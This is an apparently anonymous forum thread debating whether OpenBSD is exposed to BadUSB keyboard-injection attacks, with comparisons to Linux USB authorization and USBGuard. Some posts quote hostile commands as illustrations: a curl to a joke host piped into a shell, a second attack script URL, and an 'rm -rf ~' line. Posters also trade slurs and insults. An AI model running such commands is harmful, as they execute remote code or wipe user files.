>attach your usb pendrive
>It registers self as HID
>curl lol.lamao/own.sh | ksh
*Ack*
10 years behind linux
Can openBsd become secure?
>attach your usb pendrive
>It registers self as HID
>curl lol.lamao/own.sh | ksh
*Ack*
10 years behind linux
Seems it's over.
Raadt sisters, did we got too wienery?
Pretty sad they aren't fixing it
Can IQfy push them into being serious about security? Wasn't that their goal anyway?
>failing at the one thing you dedicated your entire operating system to
That fish kinda looks like covid-19
good thing there arent thousands of other mischievious ways to frick up a system when you have physical access to it
>User inserting an USB pendrive
Is identical to
>Giving someone full access to your hardware and leaving into cuckshed.
Lol.
>attach any HID device
>it can do the same exact thing on all operating systems
BSDbros... we lost...
No, on Linux you disable USB authorize, then check is the device trying to connect as keyboard or as disk, if it's what you want then you authorize it (if it changes something in middle then it's a new interface with new USB device and new separate authorized=0).
This tech makes bsds angry and confused
And even have programs that.automate that, ev accept new disks and nics but not hid keyboards mouses.
you can do that on bsd too
point is it isn't the default anywhere, and shouldn't be because it is a massive QOL loss for minimal security benefits.
>you can do that on bsd too
Orly?
Show how - all searching for it returns nothing.
>Not needed
How dumb are you? Inserting any pendrive, or DVD USB, nic on USB, camera on USB, can pwn your box (assuming you have or will have open console, which is common esp for bsd, or have a shortcut to open one)
It is a common requirement for classified systems.
>if an attacker has physical access to your computer it's over
It's not an attacker (standing alone over your PC, with a screwdriver and soldering iron) you dofus.
It's you, willingly inserting an USB CD-ROM reader into your pc, and that device suddenly turns out to have hacked firmware and instead is a remote keyboard.
I think you replied to the wrong guy. I'd also add that it's also about user error such as plugging in the wrong usb on accident. Just having access to the exterior of a computer is not same as the physical access that the experts mean. I wish they worded things better so idiots like the ones in this thread would stop parroting wrong advice.
If I already have physical access to an unlocked computer I can just quickly enter "lol.lamao/own.sh | ksh" myself instead of bothering with some USB device.
you have no access
think of the usb device as maybe some conference swag or chinkshit
>If I already have physical access to an unlocked computer I can just quickly enter
what a moronic homosexual mongrel!
>letting a stranger walk into your home, pick up your computer, and letting him type commands in terminal
>is exactly as insecure, unusual and alarming as:
>plugging an USB dvd reader into your computers
>it's the same thing!
fricking L A M A O
how are people so moronic? is he coping? is he not getting it?
>Illustrating the insecurity of *BSD this hard
>Just never attach USB into your openbsd, bro
>There is NO safe way to do it, no matter how much you try (hint: attach it to Linux instead)
cuck license
GPL failed. Get used to it.
if thats a problem then just turn off the usb ports
>>curl lol.lamao/own.sh | ksh
your link is not working
Sorry it’s
www.yougotpw.ned/attack.sh
if an attacker has physical access to your computer it's over anyways
the mitigation for that isn't at the OS level, it's with a gun
Read
Noob
having access to ports and the keyboard doesn't mean shit
what's meant by physical access is the access to internal components and the connections between them
Yes
>Uhhhh why does my laptop break when I hit the mainboard with an axe
Only use peripherals you trust, moron. That's security 101
You are literally a moronic imbecile.
Attach USB device that you just bought: Linux - ok; openbsd - get hacked.
Only buy from vendors you trust. Why do you think every single company bans usb sticks?
companies definitely should ban untrusted usb devices
it's sad that most don't
even windows can don this btw
openbsd mogged by microsoft lmao
linux and windows have proven to be insecure
>Only buy from vendors you trust.
No such need on Linux.
>linux and windows have proven to be insecure
no.
https://usbguard.github.io/
The USBGuard software framework helps to protect your computer against rogue USB devices (a.k.a. BadUSB) by implementing basic whitelisting and blacklisting capabilities based on device attributes.
yeah linux and windows have proven to be insecure
>yeah linux and windows have proven to be insecure
in what?
for badUSB, Linux with usbguard is secure, while OpenBSD fails
Some OpenBSD user made a simple script that protects you against it ttps://github.com/e-zk/hidlock
>just locks your X session when new kb appears
what an useless hack
it still lets all usb devices connect so it doesn't really protect against much
you want to be able to inspect the devices and make policies for which to allow
>Some FRICKING moron made a simple script that protects you against it https://github.com/e-zk/hidlock
it doesn't protect you.
>OH BRO I WILL SHUT DOWN THE COMPUTER 1 second after you get rootkited in 0.002 seconds, COOL BRO? 1.. or 3 seconds, or N seconds, depending what computer is doing. depend on random timing for your security bro!
in security-focused distro! lol.
only solution is to prevent attaching devices (all, not just hid) before they are authorized. Linux figured it out around 10 years ago.
USB HID polling is slow as shit, xlock will be faster.
But nah, let's overengineer everything with a million dbus services and policies written in JavaScript like USBGuard does.
>hinge your security on a race condition
LOL!!!
brain rot.
>Can someone explain to me what OP is on about?
https://en.wikipedia.org/wiki/BadUSB
>lets remain insecure
>asking to have /dev/.../authorized is waaaay too much bro
>better allow your usb camera to become usb keyboard controlled by attacker, that is far safer
beyond delusional
> OpenBsd can't be used with any connected devices (except the ones you build yourself)
Useless
>on usb detect
>10 second delay before registration
>ability to perform attack disappears in 104% of cases
>convenience cucks will never sacrifice
bsdtroony cope thread
OpenBSD comes with neither curl nor wget preinstalled.
Can someone explain to me what OP is on about?
no fricking idea. he just made some shit up and now moronic lintroons are all excited
the absolute state of this board
openBSD has fallen, billions must uninstall
>openBSD has fallen
if any of there compuers would make the mistake of using OpenBSD they would be successfully hacked:
targeting transportation and insurance companies (since August 2021), and defense companies (since November 2021), with BadUSB attacks designed to deliver REvil or BlackMatter ransomware.[8][9]
It's over.
In hindsight, had we a chance to motivate OpenBSD (and *BSD) to fix their shit?
Openbsd is more secure than any of your toy distros.
>Openbsd is more secure than
then why it would be hacked in this scenario while linux (with echo 0 > ....default_authorize at boot) would be 100% safe?
prove it would be hacked
If somone can touch your computer to plug in a BadUSB they can reboot into the distro. of their choice (which is Kali Linux for sophisticated gentlemen like me) and proceed to do what they want.
>If somone can touch your computer to plug in a BadUSB they can reboot into the distro.
how moronic are you to not understand this?
it's not "someone" touching your computer, it's YOU plugging in the usb pendrive you got from work.
(turns out it's not just pendrive).
>prove it would be hacked
it's already a famouse attack in the wild, read above, tard
>targeting transportation and insurance companies (since August 2021), and defense companies (since November 2021), with BadUSB attacks designed to deliver REvil or BlackMatter ransomware.[8][9]
Why would I plug an untrusted random USB drive into my pc?
>Why would I plug an untrusted random USB drive into my pc?
there is no such thing as "trusted usb".
maybe if you build one from semiconductors... do you?
Did you make your own CPU too?
How can you trust your USB protection software will work on untrusted silicon?
>Did you make your own CPU too?
yes. next question please?
>well CPU might be backdoored, better give up on any security anyway
70 IQ
vulnsplaining.
also: openbsd monitoring central: 4 cameras on usb.
can't never open console on that thing.
how moronic.
how about instead just fricking adding AUTHORIZED attribute in /proc like Linux.
>Only two remote holes in the default install, in a heck of a long time!
note where it says remote moron
the only operating system that is immune to this is one that disallows all USB; or at least has a hwid whitelist. I use badUSBs all the time on everything
https://zakaria.org/posts/2021-01-11-usbkiller.html
://marc.info/?l=openbsd-misc&m=140692695632561
>deboonked
>/thread
the link:
>2. They have created a rogue keyboard device which will type naughty
commands. In theory, the same keyboard could type "rm -rf ~" into an
xterm. This is a tiny bit more challenging since it probably depends
on your desktop environment and window manager, but presumably your
attacker will know all that.
>So yeah, vulnerable.
lol.
even your link says you are vulnerable
just dont leave a shell logged in as a superuser open, idgi. you're just typing shit into a login prompt on my obsd server if you try this lol. if you can already log in as a user with important access rights you could've just opened a remote shell anyways and saved yourself the trouble, that's true of any system. great security flaw op, very useful.
this schizo ass homie isn't even writing coherent sentences at this point
>I am too dumb to read simple english
>I will ignore the fact this attack is popular in the wild as linked above twice
please kys